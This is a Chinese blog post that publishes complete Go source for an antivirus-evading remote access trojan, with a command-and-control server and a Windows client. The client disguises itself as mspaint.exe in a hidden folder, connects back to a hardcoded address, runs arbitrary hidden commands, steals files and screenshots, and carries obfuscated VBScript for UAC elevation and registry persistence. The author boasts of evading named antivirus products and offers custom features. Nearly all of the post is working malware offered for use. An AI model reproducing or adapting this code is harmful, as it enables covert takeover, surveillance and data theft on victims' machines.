寫了一款Golang免殺遠控

0x01 工具介紹

由于工作需要,寫了一款Golang遠控軟件,現(xiàn)在也用不上了,開源算了,支持很多功能,如 ”加密傳輸、截圖回傳、反向Socks5代理回內(nèi)網(wǎng)、開機自啟“。
當(dāng)client.exe被點擊后,小馬會自動復(fù)制本身到 ”C:\ProgramData“ 隱藏目錄并再次執(zhí)行,自動刪除當(dāng)前桌面上的Clinet文件。
目前大多數(shù)遠控軟件都基于C++/C#編寫的,殺軟對這些開發(fā)語言很敏感,非常容易就被識別出來了,但使用Golang語言編寫的就不一樣了,改一改就能過360、火絨、金山、騰訊電腦管家、AVG、等等,如有需要添加其他功能,可以私我哦。。。Py

0x02 目前的功能

  • 多用戶上線,多用戶管理
  • 下載遠程文件
  • 上傳本地文件到目標電腦
  • 屏幕截圖,回傳
  • 動態(tài)設(shè)置編碼
  • 執(zhí)行系統(tǒng)任意指令
  • 安裝成服務(wù),實現(xiàn)開機自啟[x]
  • 反向socks5[x]
  • EXE文件捆綁[x]

0x05 過殺軟情況

火絨查殺

image.png

微步在線惡意文件檢測

image.png

VirSCAN.org-多引擎在線病毒掃描

image.png

0x03 服務(wù)端代碼 server.go

package main

import (
    "bufio"
    "encoding/base64"
    "flag"
    "fmt"
    "io"
    "io/ioutil"
    "log"
    "net"
    "os"
    "os/exec"
    "path/filepath"
    "strconv"
    "strings"
    "sync"
    "time"
)

const (
    WHITE   = "\x1b[37;1m"
    RED     = "\x1b[31;1m"
    GREEN   = "\x1b[32;1m"
    YELLOW  = "\x1b[33;1m"
    BLUE    = "\x1b[34;1m"
    MAGENTA = "\x1b[35;1m"
    CYAN    = "\x1b[36;1m"
    VERSION = "2.5.0"
)

var (
    inputIP         = flag.String("IP", "0.0.0.0", "Listen IP")
    inputPort       = flag.String("PORT", "53", "Listen Port")
    connPwd         = flag.String("PWD", "18Sd9fkdkf9", "Connection Password")
    counter         int                                       //用于會話計數(shù),給map的key使用
    connlist        map[int]net.Conn = make(map[int]net.Conn) //存儲所有連接的會話
    connlistIPAddr  map[int]string   = make(map[int]string)   //存儲所有IP地址,提供輸入標識符顯示
    lock                             = &sync.Mutex{}
    downloadOutName string
)

func getDateTime() string {
    currentTime := time.Now()
    // https://golang.org/pkg/time/#example_Time_Format
    return currentTime.Format("2006-01-02-15-04-05")
}

// ReadLine 函數(shù)等待命令行輸入,返回字符串
func ReadLine() string {
    buf := bufio.NewReader(os.Stdin)
    lin, _, err := buf.ReadLine()
    if err != nil {
        fmt.Println(RED, "[!] Error to Read Line!")
    }
    return string(lin)
}

// Socket客戶端連接處理程序,專用于接收消息處理
func connection(conn net.Conn) {
    defer conn.Close()
    var myid int
    myip := conn.RemoteAddr().String()

    lock.Lock()
    counter++
    myid = counter
    connlist[counter] = conn
    connlistIPAddr[counter] = myip
    lock.Unlock()

    fmt.Printf("--- client: %s connection ---\n", myip)
    for {
        message, err := bufio.NewReader(conn).ReadString('\n')
        //如果客戶端斷開
        if err == io.EOF {
            conn.Close()
            delete(connlist, myid)
            delete(connlistIPAddr, myid)
            break
        }
        decoded, _ := base64.StdEncoding.DecodeString(message)
        decMessage := string(decoded)
        switch decMessage {

        case "download":
            //fmt.Println("---收到download指令,等待下一次數(shù)據(jù)上傳---")
            // 等待用戶上傳數(shù)據(jù)
            encData, _ := bufio.NewReader(conn).ReadString('\n')
            fmt.Println(YELLOW, "-> Downloading...")
            decData, _ := base64.URLEncoding.DecodeString(encData)
            downFilePath, _ := filepath.Abs(string(downloadOutName) + getDateTime())
            ioutil.WriteFile(downFilePath, []byte(decData), 777)
            fmt.Println(GREEN, "-> Download Done...")
        case "screenshot":
            encData, _ := bufio.NewReader(conn).ReadString('\n')
            fmt.Println(YELLOW, "-> Getting ScreenShot...")
            decData, _ := base64.URLEncoding.DecodeString(encData)
            //filename := myip + getDateTime()+".png"
            absFilePath, _ := filepath.Abs(strings.Replace(myip, ":", "_", -1) + getDateTime() + ".png")
            ioutil.WriteFile(absFilePath, []byte(decData), 777)
            fmt.Printf(GREEN+"-> ScreenShot Done, filename: %s\n", absFilePath)

        default:
            fmt.Println("\n" + decMessage)
        }
    }
    fmt.Printf("--- %s close---\n", myip)
}

// 等待Socket 客戶端連接
func handleConnWait() {
    l, err := net.Listen("tcp", *inputIP+":"+*inputPort)
    if err != nil {
        log.Fatal(err)
    }
    defer l.Close()
    for {
        conn, err := l.Accept()
        if err != nil {
            log.Fatal(err)
        }
        message, err := bufio.NewReader(conn).ReadString('\n')
        decoded, _ := base64.StdEncoding.DecodeString(message)
        if string(decoded) == *connPwd {
            go connection(conn)
        } else {
            backMsg := base64.URLEncoding.EncodeToString([]byte("back"))
            conn.Write([]byte(backMsg + "\n"))
            conn.Close()
        }
    }
}

func main() {
    flag.Parse()
    go handleConnWait()
    connid := 0
    for {
        fmt.Print(RED, "SESSION ", connlistIPAddr[connid], WHITE, "> ")
        command := ReadLine()
        _conn, ok := connlist[connid]
        switch command {
        case "":
        // 如果輸入為空,則什么都不做
        case "help":
            fmt.Println("")
            fmt.Println(CYAN, "COMMANDS              DESCRIPTION")
            fmt.Println(CYAN, "-------------------------------------------------------")
            fmt.Println(CYAN, "session             選擇在線的客戶端")
            fmt.Println(CYAN, "download            下載遠程文件")
            fmt.Println(CYAN, "upload              上傳本地文件")
            fmt.Println(CYAN, "screenshot          遠程桌面截圖")
            fmt.Println(CYAN, "charset gbk         設(shè)置客戶端命令行輸出編碼,gbk是簡體中文")
            fmt.Println(CYAN, "clear               清楚屏幕")
            fmt.Println(CYAN, "exit                客戶端下線")
            fmt.Println(CYAN, "quit                退出服務(wù)器端")
            fmt.Println(CYAN, "startup             加入啟動項目文件夾")
            fmt.Println(CYAN, "-------------------------------------------------------")
            fmt.Println("")
        case "session":
            fmt.Println(connlist)
            fmt.Print("選擇客戶端ID: ")
            inputid := ReadLine()
            if inputid != "" {
                var e error
                connid, e = strconv.Atoi(inputid)
                if e != nil {
                    fmt.Println("請輸入數(shù)字")
                } else if _, ok := connlist[connid]; ok {
                    //如果輸入并且存在客戶端id
                    _cmd := base64.URLEncoding.EncodeToString([]byte("getos"))
                    connlist[connid].Write([]byte(_cmd + "\n"))
                }
            }
        case "clear":
            ClearScreen()
        case "exit":
            if ok {
                encDownload := base64.URLEncoding.EncodeToString([]byte("exit"))
                _conn.Write([]byte(encDownload + "\n"))
            }
        case "quit":
            os.Exit(0)
        case "download":
            if ok {
                // 第一步,發(fā)送下載指令
                encDownload := base64.URLEncoding.EncodeToString([]byte("download"))
                _conn.Write([]byte(encDownload + "\n"))
                // 第二步,輸入下載路徑和要保存的文件名,發(fā)送給客戶端
                fmt.Print("File Path to Download: ")
                nameDownload := ReadLine()
                fmt.Print("Output name: ")
                downloadOutName = ReadLine()
                // 下發(fā)需要download的文件名路徑, conn連接的協(xié)程里面接收
                encName := base64.URLEncoding.EncodeToString([]byte(nameDownload))
                _conn.Write([]byte(encName + "\n"))
                fmt.Print(encName)
            }

        case "screenshot":
            if ok {
                encScreenShot := base64.URLEncoding.EncodeToString([]byte("screenshot"))
                _conn.Write([]byte(encScreenShot + "\n"))
            }

        case "upload":
            if ok {
                encUpload := base64.URLEncoding.EncodeToString([]byte("upload"))
                _conn.Write([]byte(encUpload + "\n"))

                fmt.Print("File Path to Upload: ")
                pathUpload := ReadLine()

                fmt.Print("Output name: ")
                outputName := ReadLine()
                encOutput := base64.URLEncoding.EncodeToString([]byte(outputName))
                _conn.Write([]byte(encOutput + getDateTime() + "\n"))

                fmt.Println(YELLOW, "-> Uploading...")
                //上傳文件
                file, err := ioutil.ReadFile(pathUpload)
                if err != nil {
                    fmt.Println(RED, "[!] File not found!")
                    break
                }
                encData := base64.URLEncoding.EncodeToString(file)
                _conn.Write([]byte(string(encData) + "\n"))
                fmt.Println(GREEN, "-> Upload Done...")
            }
        default:
            if ok {
                _cmd := base64.URLEncoding.EncodeToString([]byte(command))
                _conn.Write([]byte(_cmd + "\n"))
            }
        }
    }
}

// ClearScreen 清除屏幕
func ClearScreen() {
    cmd := exec.Command("clear")
    cmd.Stdout = os.Stdout
    cmd.Run()
}

0x04 客戶端代碼 client.go

客戶端編譯前,需要更改上線IP、連接密碼CONNPWD這兩個參數(shù),因為只有與服務(wù)端的連接密碼相同時,才會建立連接,保證了建立Socket時不會出現(xiàn)上線誤報問題。

package main

import (
    "bufio"
    "bytes"
    "context"
    "encoding/base64"
    "fmt"
    "image/png"
    "io"
    "io/ioutil"
    "log"
    "net"
    "os"
    "os/exec"
    "path/filepath"
    "runtime"
    "strings"
    "syscall"
    "time"

    "github.com/axgle/mahonia"
    screenshot "github.com/kbinani/screenshot"
)

const (
    IP      = "192.168.1.209:53"
    CONNPWD = "18Sd9fkdkf9"
)

var (
    // cmd執(zhí)行超時的秒數(shù)
    Timeout = 30 * time.Second
    // cmd 輸出字符串編碼
    charset = "utf-8"
)

func main() {
    if runtime.GOOS == "windows" {
        targetPath := os.Getenv("systemdrive") + "\\ProgramData\\"
        targetFile := targetPath + "mspaint.exe"
        os.Mkdir(targetPath, os.ModePerm)
        //exec.Command("")
        //獲取當(dāng)前文件執(zhí)行的絕對路徑

        currentFile, _ := exec.LookPath(os.Args[0])
        currentFileAbs, _ := filepath.Abs(currentFile)
        // 如果當(dāng)前執(zhí)行都文件是復(fù)制后的目標文件,

        if currentFileAbs == targetFile {
            // 刪除原有文件
            fmt.Println(len(os.Args))
            if len(os.Args) > 1 {
                err := os.Chmod(os.Args[1], 0777)
                if err != nil {
                    fmt.Println(err)
                }
                //err = os.Remove(os.Args[1])
                //if err != nil {
                fmt.Println(err)
                //}
            }

            //開始連接
            for {
                connect()
            }
        } else {
            //設(shè)定一個目標文件信息
            _, err := os.Stat(targetFile)
            if err != nil {
                // 打開源文件
                srcFile, _ := os.Open(currentFile)
                //創(chuàng)建目標文件
                desFile, err := os.Create(targetFile)
                if err != nil {
                    fmt.Println(err)
                }
                //copy源文件的內(nèi)容到目標文件
                _, err = io.Copy(desFile, srcFile)
                if err != nil {
                    fmt.Println(err)
                }

                //設(shè)定目標文件權(quán)限 0777, 這樣才可以啟動
                err = os.Chmod(targetFile, 0777)
                if err != nil {
                    fmt.Println(err)
                }
                //不能使用 defer desFile.Close(), 需要在執(zhí)行前關(guān)閉文件句柄
                srcFile.Close()
                desFile.Close()
                // start 啟動目標程序,進程不需要等待交互
                mCommand(targetFile, currentFileAbs)
                // 打開圖片
                //mCommand("cmd.exe", "/c", "start", "max.jpg")
                //install_start() //自七
            } else {
                // 如果文件已經(jīng)存在,start 啟動目標程序,進程不需要等待交互
                mCommand(targetFile, currentFileAbs)
                // 打開圖片
                //mCommand("cmd.exe", "/c", "start", "max.jpg")
                //install_start() //自七

            }
        }

    } else {
        for {
            connect()
        }
    }
}

func install_start() { //windows提升權(quán)限,加注冊表,
    err := ioutil.WriteFile("test.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(85)&chr(65)&chr(67)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(108)&chr(105)&chr(99)&chr(97)&chr(116)&chr(105)&chr(111)&chr(110)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(83)&chr(101)&chr(116)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(60)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(35821)&chr(27861)&chr(58)&chr(32)&chr(32)&chr(115)&chr(117)&chr(100)&chr(111)&chr(32)&chr(60)&chr(99)&chr(111)&chr(109)&chr(109)&chr(97)&chr(110)&chr(100)&chr(62)&chr(32)&chr(91)&chr(97)&chr(114)&chr(103)&chr(115)&chr(93)&chr(34)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(73)&chr(102)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(108)&chr(101)&chr(101)&chr(112)&chr(32)&chr(49)&chr(53)&chr(48)&chr(48)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(65)&chr(112)&chr(112)&chr(97)&chr(99)&chr(116)&chr(105)&chr(118)&chr(97)&chr(116)&chr(101)&chr(40)&chr(34)&chr(29992)&chr(25143)&chr(36134)&chr(25143)&chr(25511)&chr(21046)&chr(34)&chr(41)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(73)&chr(102)&chr(32)&chr(114)&chr(101)&chr(116)&chr(32)&chr(61)&chr(32)&chr(116)&chr(114)&chr(117)&chr(101)&chr(32)&chr(84)&chr(104)&chr(101)&chr(110)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(46)&chr(115)&chr(101)&chr(110)&chr(100)&chr(107)&chr(101)&chr(121)&chr(115)&chr(32)&chr(34)&chr(37)&chr(121)&chr(34)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(101)&chr(99)&chr(104)&chr(111)&chr(32)&chr(34)&chr(33258)&chr(21160)&chr(33719)&chr(21462)&chr(31649)&chr(29702)&chr(21592)&chr(26435)&chr(38480)&chr(22833)&chr(36133)&chr(65292)&chr(35831)&chr(25163)&chr(21160)&chr(30830)&chr(35748)&chr(12290)&chr(34)&chr(32)&chr(32)&chr(10)&chr(39)&chr(32)&chr(32)&chr(32)&chr(32)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32)&chr(10)&chr(69)&chr(108)&chr(115)&chr(101)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(68)&chr(105)&chr(109)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(78)&chr(85)&chr(76)&chr(76)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(70)&chr(111)&chr(114)&chr(32)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(61)&chr(49)&chr(32)&chr(84)&chr(111)&chr(32)&chr(40)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(46)&chr(99)&chr(111)&chr(117)&chr(110)&chr(116)&chr(45)&chr(49)&chr(41)&chr(32)&chr(83)&chr(116)&chr(101)&chr(112)&chr(32)&chr(49)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(61)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(32)&chr(38)&chr(32)&chr(34)&chr(32)&chr(34)&chr(32)&chr(38)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(65)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(117)&chr(99)&chr(67)&chr(111)&chr(117)&chr(110)&chr(116)&chr(41)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(78)&chr(101)&chr(120)&chr(116)&chr(32)&chr(32)&chr(10)&chr(32)&chr(32)&chr(32)&chr(32)&chr(85)&chr(65)&chr(67)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(69)&chr(120)&chr(101)&chr(99)&chr(117)&chr(116)&chr(101)&chr(32)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(97)&chr(114)&chr(103)&chr(117)&chr(109)&chr(101)&chr(110)&chr(116)&chr(115)&chr(40)&chr(48)&chr(41)&chr(44)&chr(32)&chr(97)&chr(114)&chr(103)&chr(115)&chr(44)&chr(32)&chr(34)&chr(34)&chr(44)&chr(32)&chr(34)&chr(114)&chr(117)&chr(110)&chr(97)&chr(115)&chr(34)&chr(44)&chr(32)&chr(53)&chr(32)&chr(32)&chr(10)&chr(69)&chr(110)&chr(100)&chr(32)&chr(73)&chr(102)&chr(32)&chr(32))"), 0666)

    if err != nil {
        log.Fatal(err)
    }

    err2 := ioutil.WriteFile("add.vbs", []byte("execute(chr(83)&chr(101)&chr(116)&chr(32)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(32)&chr(61)&chr(32)&chr(67)&chr(114)&chr(101)&chr(97)&chr(116)&chr(101)&chr(79)&chr(98)&chr(106)&chr(101)&chr(99)&chr(116)&chr(40)&chr(34)&chr(87)&chr(83)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(46)&chr(83)&chr(104)&chr(101)&chr(108)&chr(108)&chr(34)&chr(41)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101)&chr(10)&chr(111)&chr(98)&chr(106)&chr(87)&chr(115)&chr(104)&chr(46)&chr(82)&chr(117)&chr(110)&chr(32)&chr(34)&chr(116)&chr(101)&chr(115)&chr(116)&chr(46)&chr(118)&chr(98)&chr(115)&chr(32)&chr(114)&chr(101)&chr(103)&chr(32)&chr(97)&chr(100)&chr(100)&chr(32)&chr(72)&chr(75)&chr(69)&chr(89)&chr(95)&chr(76)&chr(79)&chr(67)&chr(65)&chr(76)&chr(95)&chr(77)&chr(65)&chr(67)&chr(72)&chr(73)&chr(78)&chr(69)&chr(92)&chr(83)&chr(79)&chr(70)&chr(84)&chr(87)&chr(65)&chr(82)&chr(69)&chr(92)&chr(77)&chr(105)&chr(99)&chr(114)&chr(111)&chr(115)&chr(111)&chr(102)&chr(116)&chr(92)&chr(87)&chr(105)&chr(110)&chr(100)&chr(111)&chr(119)&chr(115)&chr(92)&chr(67)&chr(117)&chr(114)&chr(114)&chr(101)&chr(110)&chr(116)&chr(86)&chr(101)&chr(114)&chr(115)&chr(105)&chr(111)&chr(110)&chr(92)&chr(82)&chr(117)&chr(110)&chr(32)&chr(47)&chr(118)&chr(32)&chr(65)&chr(85)&chr(84)&chr(79)&chr(82)&chr(85)&chr(78)&chr(32)&chr(47)&chr(116)&chr(32)&chr(82)&chr(69)&chr(71)&chr(95)&chr(83)&chr(90)&chr(32)&chr(47)&chr(100)&chr(32)&chr(67)&chr(58)&chr(92)&chr(80)&chr(114)&chr(111)&chr(103)&chr(114)&chr(97)&chr(109)&chr(68)&chr(97)&chr(116)&chr(97)&chr(92)&chr(109)&chr(115)&chr(112)&chr(97)&chr(105)&chr(110)&chr(116)&chr(46)&chr(101)&chr(120)&chr(101)&chr(32)&chr(47)&chr(102)&chr(34)&chr(44)&chr(118)&chr(98)&chr(104)&chr(105)&chr(100)&chr(101))"), 0666)
    if err2 != nil {
        log.Fatal(err)
    }

    c := exec.Command("cmd", "/c", "add.vbs")
    c.Run()

    er := os.Remove("add.vbs")
    if err != nil {
        log.Fatal(er)
    }

}

// 獲取不同操作系統(tǒng)的環(huán)境的截圖臨時文件的位置
func getScreenshotFilename() string {
    var (
        filepath string
    )
    if runtime.GOOS == "windows" {
        filepath = os.Getenv("systemdrive") + "\\ProgramData\\tmp.png"
    } else {
        filepath = "/tmp/.tmp.png"
    }
    return filepath
}

// 轉(zhuǎn)化字符串
func ConvertToString(src string, srcCode string, tagCode string) string {
    srcCoder := mahonia.NewDecoder(srcCode)
    srcResult := srcCoder.ConvertString(src)
    tagCoder := mahonia.NewDecoder(tagCode)
    _, cdata, _ := tagCoder.Translate([]byte(srcResult), true)
    result := string(cdata)
    return result
}

// TakeScreenShot 截圖功能,并存儲到本地
func TakeScreenShot() {
    n := screenshot.NumActiveDisplays()
    fpath := getScreenshotFilename()
    for i := 0; i < n; i++ {
        bounds := screenshot.GetDisplayBounds(i)

        img, err := screenshot.CaptureRect(bounds)
        if err != nil {
            connect()
        }
        file, _ := os.Create(fpath)
        defer file.Close()
        png.Encode(file, img)
    }
}

// 連接遠程服務(wù)器
func connect() {
    conn, err := net.Dial("tcp", IP)
    if err != nil {
        fmt.Println("Connection...")
        for {
            connect()
        }
    }
    errMsg := base64.URLEncoding.EncodeToString([]byte(CONNPWD))
    conn.Write([]byte(string(errMsg) + "\n"))
    fmt.Println("Connection success...")

    for {
        //等待接收指令,以 \n 為結(jié)束符,所有指令字符都經(jīng)過base64
        message, err := bufio.NewReader(conn).ReadString('\n')
        if err == io.EOF {
            // 如果服務(wù)器斷開,則重新連接
            conn.Close()
            connect()
        }
        // 收到指令base64解碼
        decodedCase, _ := base64.StdEncoding.DecodeString(message)
        command := string(decodedCase)
        cmdParameter := strings.Split(command, " ")
        switch cmdParameter[0] {
        case "back":
            conn.Close()
            connect()
        case "exit":
            conn.Close()
            os.Exit(0)
        case "charset":
            if len(cmdParameter) == 2 {
                charset = cmdParameter[1]
            }
        case "upload":
            uploadOutput, _ := bufio.NewReader(conn).ReadString('\n')
            decodeOutput, _ := base64.StdEncoding.DecodeString(uploadOutput)
            encData, _ := bufio.NewReader(conn).ReadString('\n')
            decData, _ := base64.URLEncoding.DecodeString(encData)
            ioutil.WriteFile(string(decodeOutput), []byte(decData), 777)

        case "download":
            // 第一步收到下載指令,什么都不做,繼續(xù)等待下載路徑
            download, _ := bufio.NewReader(conn).ReadString('\n')
            decodeDownload, _ := base64.StdEncoding.DecodeString(download)
            file, err := ioutil.ReadFile(string(decodeDownload))
            if err != nil {
                // 找不到文件,發(fā)送錯誤消息
                errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
                conn.Write([]byte(string(errMsg) + "\n"))
                break
            }
            //發(fā)送一個download指令給服務(wù)器端準備接收
            srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("download"))
            conn.Write([]byte(string(srvDownloadMsg) + "\n"))
            //讀文件上傳
            encData := base64.URLEncoding.EncodeToString(file)
            conn.Write([]byte(string(encData) + "\n"))

        case "screenshot":
            TakeScreenShot()
            file, err := ioutil.ReadFile(getScreenshotFilename())
            if err != nil {
                // 找不到文件,發(fā)送錯誤消息
                errMsg := base64.URLEncoding.EncodeToString([]byte("[!] File not found!"))
                conn.Write([]byte(string(errMsg) + "\n"))
                break
            }
            //發(fā)送一個download指令給服務(wù)器端準備接收
            srvDownloadMsg := base64.URLEncoding.EncodeToString([]byte("screenshot"))
            conn.Write([]byte(string(srvDownloadMsg) + "\n"))

            //讀圖片文件上傳
            encData := base64.URLEncoding.EncodeToString(file)
            conn.Write([]byte(string(encData) + "\n"))

        case "getos":
            if runtime.GOOS == "windows" {
                command = "wmic os get name"
            } else {
                command = "uname -a"
            }
            fallthrough
        default:
            cmdArray := strings.Split(command, " ")
            cmdSlice := cmdArray[1:len(cmdArray)]
            out, outerr := mCommandTimeOut(cmdArray[0], cmdSlice...)
            if outerr != nil {
                out = []byte(outerr.Error())
            }
            // 解決命令行輸出編碼問題
            if charset != "utf-8" {
                out = []byte(ConvertToString(string(out), charset, "utf-8"))
            }
            encoded := base64.StdEncoding.EncodeToString(out)
            conn.Write([]byte(encoded + "\n"))
        }
    }
}

func mCommandTimeOut(name string, arg ...string) ([]byte, error) {
    ctxt, cancel := context.WithTimeout(context.Background(), Timeout)
    defer cancel()
    // 通過上下文執(zhí)行,設(shè)置超時
    cmd := exec.CommandContext(ctxt, name, arg...)
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    //cmd.SysProcAttr = &syscall.SysProcAttr{}

    var buf bytes.Buffer
    cmd.Stdout = &buf
    cmd.Stderr = &buf

    if err := cmd.Start(); err != nil {
        return buf.Bytes(), err
    }

    if err := cmd.Wait(); err != nil {
        return buf.Bytes(), err
    }

    return buf.Bytes(), nil
}

func mCommand(name string, arg ...string) {
    cmd := exec.Command(name, arg...)
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
    err := cmd.Start()
    if err != nil {
        fmt.Println(err)
    }
}

0x05 關(guān)于使用

修改好,其中的一些連接參數(shù),密碼,端口,編譯成EXE即可,Golang支持跨平臺,也可以編譯成Linux版本,進行遠程控制。

點我下載完整代碼

未經(jīng)許可禁止轉(zhuǎn)載

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
